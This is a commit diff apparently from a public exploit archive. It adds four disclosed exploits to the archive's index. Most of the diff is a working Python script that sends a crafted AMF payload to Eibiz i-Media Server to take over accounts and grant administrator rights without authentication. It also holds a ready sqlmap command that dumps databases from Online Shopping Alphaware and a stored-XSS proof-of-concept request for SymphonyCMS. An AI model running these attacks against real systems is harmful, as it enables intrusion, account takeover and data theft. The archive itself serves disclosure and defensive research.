DB: 2020-08-29

4 changes to exploits/shellcodes Online Shopping Alphaware 1.0 - 'id' SQL Injection Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation
2020-08-29 05:01:59 +00:00 · 2020-08-29 05:01:59 +00:00 · abfd379775
commit abfd379775
parent 2621b3c52e
5 changed files with 324 additions and 0 deletions
--- a/exploits/hardware/webapps/48774.py
+++ b/exploits/hardware/webapps/48774.py
@ -0,0 +1,201 @@
+# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation
+# Date: 2020-08-28
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.eibiz.co.th
+# Version: 3.8.0
+# Tested on: Windows
+# CVE : N/A
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover
+#
+#
+# Vendor: EIBIZ Co.,Ltd.
+# Product web page: http://www.eibiz.co.th
+# Affected version: <=3.8.0
+#
+# Summary: EIBIZ develop advertising platform for out of home media in that
+# time the world called "Digital Signage". Because most business customers
+# still need get outside to get in touch which products and services. Online
+# media alone cannot serve them right place, right time.
+#
+# Desc: The application suffers from an unauthenticated remote privilege escalation
+# and account takeover vulnerability that can be triggered by directly calling the
+# updateUser object (part of ActionScript object graphs), effectively elevating to
+# an administrative role or taking over an existing account by modifying the settings.
+#
+# Tested on: Windows Server 2016
+#            Windows Server 2012 R2
+#            Windows Server 2008 R2
+#            Apache Flex
+#            Apache Tomcat/6.0.14
+#            Apache-Coyote/1.1
+#            BlazeDS Application
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5584
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php
+#
+#
+# 26.07.2020
+#
+#
+
+
+import requests
+import sys#####|
+import re##### |
+#############  |
+############   |
+###########    |
+##########     |
+#########      |
+########       |
+#######        |
+######         |
+#####          |
+#PoC           |
+###            |
+##             |
+#              |
+class Escalada:
+    
+    def __init__(self):
+        self.session = "11111111112222222222333333333344"
+        self.agent = "DigitalSigner/25.1"
+        self.display = "Intruder Alert"
+        self.ep = "/messagebroker/amf"
+        self.suprole = "Designer"
+        self.serialize = None
+        self.address = None
+        self.usrname = None
+        self.passwrd = None
+        self.headers = None
+
+    def usage(self):
+    	if len(sys.argv) < 5:
+            print("i-Media Server Digital Signage 3.8.0 Privilege Escalation")
+            print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]")
+            print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator")
+            exit(21)
+        else:
+            self.address = sys.argv[1]
+            self.usrname = sys.argv[2]
+            self.passwrd = sys.argv[3]
+            self.display = sys.argv[4]
+            self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5])
+            #__
+            #  | Administrator __
+            #                    | Designer __
+            #                                 | Reporter __
+            #                                              | Approver
+            if not "http" in self.address:
+                self.address = "http://{}".format(self.address)
+
+    def amf(self):
+    	self.cookies = {"JSESSIONID"      : self.session} # not really needed
+        self.headers = {"User-Agent"      : self.agent,
+                        "Accept"          : "*/*",
+                        "Accept-Language" : "en-US,en;q=0.5",
+                        "Accept-Encoding" : "gzip, deflate",
+                        "Origin"          : self.address,
+                        "Connection"      : "close",
+                        "Referer"         : self.address + "/main.swf",
+                        "Content-Type"    : "application/x-amf"}
+
+        self.serialize  = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E\x75\x6C\x6C"
+        self.serialize += b"\x00\x03\x2F\x35\x38\x00\x00\x01\xFE\x0A\x00\x00"
+        self.serialize += b"\x00\x01\x11\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
+        self.serialize += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2E\x6D\x65"
+        self.serialize += b"\x73\x73\x61\x67\x65\x73\x2E\x52\x65\x6D\x6F\x74"
+        self.serialize += b"\x69\x6E\x67\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
+        self.serialize += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65\x72\x61\x74"
+        self.serialize += b"\x69\x6F\x6E\x13\x6D\x65\x73\x73\x61\x67\x65\x49"
+        self.serialize += b"\x64\x13\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x09"
+        self.serialize += b"\x62\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E\x74\x49"
+        self.serialize += b"\x64\x17\x64\x65\x73\x74\x69\x6E\x61\x74\x69\x6F"
+        self.serialize += b"\x6E\x15\x74\x69\x6D\x65\x54\x6F\x4C\x69\x76\x65"
+        self.serialize += b"\x0F\x68\x65\x61\x64\x65\x72\x73\x01\x06\x15\x75"
+        self.serialize += b"\x70\x64\x61\x74\x65\x55\x73\x65\x72\x06\x49\x31"
+        self.serialize += b"\x42\x38\x39\x37\x41\x38\x36\x2D\x37\x33\x42\x45"
+        self.serialize += b"\x2D\x30\x35\x42\x31\x2D\x43\x45\x42\x33\x2D\x41"
+        self.serialize += b"\x30\x35\x35\x30\x39\x36\x34\x31\x31\x34\x34\x04"
+        self.serialize += b"\x00\x09\x05\x01\x0A\x81\x73\x1B\x64\x73\x2E\x6D"
+        self.serialize += b"\x6F\x64\x65\x6C\x2E\x55\x73\x65\x72\x11\x70\x61"
+        self.serialize += b"\x73\x73\x77\x6F\x72\x64\x0D\x63\x72\x65\x61\x74"
+        self.serialize += b"\x65\x07\x74\x65\x6C\x07\x66\x61\x78\x09\x6E\x61"
+        self.serialize += b"\x6D\x65\x0F\x61\x64\x64\x72\x65\x73\x73\x0D\x75"
+        self.serialize += b"\x70\x64\x61\x74\x65\x05\x69\x64\x0D\x6D\x6F\x62"
+        self.serialize += b"\x69\x6C\x65\x0F\x75\x44\x65\x6C\x65\x74\x65\x15"
+        self.serialize += b"\x64\x65\x70\x61\x72\x74\x6D\x65\x6E\x74\x09\x72"
+        self.serialize += b"\x6F\x6C\x65\x09\x72\x65\x61\x64\x0B\x65\x6D\x61"
+        self.serialize += b"\x69\x6C\x0F\x63\x6F\x6D\x70\x61\x6E\x79\x06" #-"
+        
+        self.bytecount  = len(self.passwrd * 2) + 1
+        self.bytesdata  = [self.bytecount]
+        self.serialize += "".join(map(chr, self.bytesdata))
+        
+        self.serialize += (bytes(self.passwrd.encode("utf-8"))) #-----------"
+        self.serialize += b"\x03\x06\x19\x31\x31\x31\x2D\x32\x32\x32\x2D\x33"
+        self.serialize += b"\x33\x33\x33\x06\x19\x33\x33\x33\x2D\x32\x32\x32"
+        self.serialize += b"\x2D\x31\x31\x31\x31\x06" #---------------------"
+        
+        self.bytecount  = len(self.display * 2) + 1
+        self.bytesdata  = [self.bytecount]
+        self.serialize += "".join(map(chr, self.bytesdata))
+        
+        self.serialize += (bytes(self.display.encode("utf-8"))) #-----------"
+        self.serialize += b"\x06\x1F\x49\x6D\x61\x67\x69\x6E\x61\x72\x79\x53"
+        self.serialize += b"\x74\x72\x65\x65\x74\x03\x06" #-----------------"
+
+        self.bytecount  = len(self.usrname * 2) + 1
+        self.bytesdata  = [self.bytecount]
+        self.serialize += "".join(map(chr, self.bytesdata))
+        
+        self.serialize += (bytes(self.usrname.encode("utf-8"))) #-----------"
+        self.serialize += b"\x06\x01\x03\x06\x11\x53\x65\x63\x75\x72\x69\x74"
+        self.serialize += b"\x79\x06" #-------------------------------------"
+
+        self.bytecount  = len(self.suprole * 2) + 1
+        self.bytesdata  = [self.bytecount]
+        self.serialize += "".join(map(chr, self.bytesdata))
+        
+        self.serialize += (bytes(self.suprole.encode("utf-8"))) #-----------"
+        self.serialize += b"\x03\x06\x15\x7A\x73\x6C\x40\x77\x68\x61\x2E\x62"
+        self.serialize += b"\x61\x06\x07\x5A\x53\x4C\x06\x42\x01\x06\x17\x75"
+        self.serialize += b"\x73\x65\x72\x53\x65\x72\x76\x69\x63\x65\x04\x00"
+        self.serialize += b"\x0A\x0B\x01\x09\x44\x53\x49\x64\x06\x49\x34\x41"
+        self.serialize += b"\x35\x46\x33\x33\x43\x33\x2D\x37\x31\x31\x46\x2D"
+        self.serialize += b"\x35\x38\x45\x38\x2D\x39\x30\x35\x30\x2D\x39\x35"
+        self.serialize += b"\x44\x31\x30\x30\x46\x33\x44\x45\x33\x45\x15\x44"
+        self.serialize += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74\x06\x0D\x6D"
+        self.serialize += b"\x79\x2D\x61\x6D\x66\x01" #---------------------"
+
+        print("First try...")
+        req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
+        #print(req.text.encode("utf-8"))
+        if "Detected duplicate HTTP-based FlexSessions" in req.text:
+            print("Second try...")
+            req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
+            #print(req.text.encode("utf-8"))
+            if "AcknowledgeMessage" in req.text:
+                print("You are " + self.suprole + " now!")
+            else:
+                print("Didn't work.")
+                exit(0)
+        else:
+        	print("Try again!")
+
+    def main(self):
+        self.usage()
+        self.amf()
+
+if __name__ == '__main__':
+    Escalada().main()
--- a/exploits/multiple/webapps/48772.txt
+++ b/exploits/multiple/webapps/48772.txt
@ -0,0 +1,22 @@
+# Exploit Title: Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting
+# Date: 2020-08-07
+# Vendor Homepage: https://www.nagios.com/products/nagios-log-server/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-log-server/change-log/
+# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
+# Author Advisory: https://www.getastra.com/blog/911/stored-xss-vulnerability-nagios-log-server/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 2.1.6 and below
+# CVE : CVE-2020-16157
+
+1. Description
+
+Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS. An attacker (in this case, an authenticated regular user) can use this vulnerability to execute malicious JavaScript aimed to steal cookies, redirect users, perform arbitrary actions on the victim’s (in this case, an admin’s) behalf, logging their keystroke and more.
+
+2. Vulnerability
+
+The "Full Name" and "Username" fields in the /profile page or /admin/users/create page are vulnerable to Stored XSS. Once a payload is saved in one of these fields, navigate to the Alerting page (/alerts) and create a new alert and select Email Users as the Notification Method. As the user list is shown, it can be seen that the payload gets executed.
+
+3. Timeline
+
+Vulnerability reported to the Nagios team – July 08, 2020
+Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020
--- a/exploits/php/webapps/48771.txt
+++ b/exploits/php/webapps/48771.txt
@ -0,0 +1,12 @@
+# Title: Online Shopping Alphaware 1.0 - 'id' SQL Injection
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-08-28
+# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+# Description
+This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.
+
+#POC
+sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
--- a/exploits/php/webapps/48773.txt
+++ b/exploits/php/webapps/48773.txt
@ -0,0 +1,85 @@
+# Exploit Title: SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting
+# Google Dork: "lepton cms"
+# Date: 2020-08-28
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://www.getsymphony.com/
+# Software Link: https://www.getsymphony.com/
+# Version: 3.0.0
+# Tested on: Windows
+# CVE : N/A
+
+Description:
+Cross-site scripting (XSS) vulnerabilities in Symphony CMS 3.0.0 allow remote attackers to inject arbitrary web script or HTML
+
+To Reproduce:
+Steps to reproduce the behavior:
+
+1. Login as member
+2. Go to 'Articles'
+3. Submit malicious content
+4. Anyone (inclued admin) view article and XSS excuted
+
+Expected behavior
+When admin or user view content, a pop-up will be displayed
+
+Affected componets:
+events\event.publish_article.php in Symphony CMS 3.0.0 allows XSS via fields['body'] to appendSubheading
+
+POC:
+
+POST /symphonycms/symphony/publish/articles/new/ HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://target/symphonycms/symphony/publish/articles/new/
+Content-Type: multipart/form-data; boundary=---------------------------17679481844164416353626544932
+Content-Length: 1111
+Origin: http://target
+Connection: close
+Cookie: PHPSESSID=b21qllug0g7ft80ueo3bn0bgcd;
+Upgrade-Insecure-Requests: 1
+
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="xsrf"
+
+vr-i2mWs18DPjVmZ8z2nB-Gb3hdyrb
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+5242880
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="fields[title]"
+
+TEST XSS
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="fields[body]"
+
+<script>alert('XSS')</script>
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="fields[date]"
+
+08/28/2020 5:55 am
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="fields[categories][]"
+
+2
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="fields[publish]"
+
+yes
+-----------------------------17679481844164416353626544932
+Content-Disposition: form-data; name="action[save]"
+
+Create Entry
+-----------------------------17679481844164416353626544932--
+
+Desktop (please complete the following information):
+OS: Windows 10
+Browser: Firefox or Chrome
+Application: XAMPP, Burpsuite
+
+Additional context
+Tested on: 9.03.50 verison
+POC at: https://vimeo.com/405740251
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43009,3 +43009,7 @@ id,file,description,date,author,type,platform,port
 48766,exploits/multiple/webapps/48766.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal",2020-08-26,LiquidWorm,webapps,multiple,
 48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,
 48770,exploits/php/webapps/48770.txt,"Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)",2020-08-27,"SunCSR Team",webapps,php,
+48771,exploits/php/webapps/48771.txt,"Online Shopping Alphaware 1.0 - 'id' SQL Injection",2020-08-28,"Moaaz Taha",webapps,php,
+48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,
+48773,exploits/php/webapps/48773.txt,"SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting",2020-08-28,SunCSR,webapps,php,
+48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,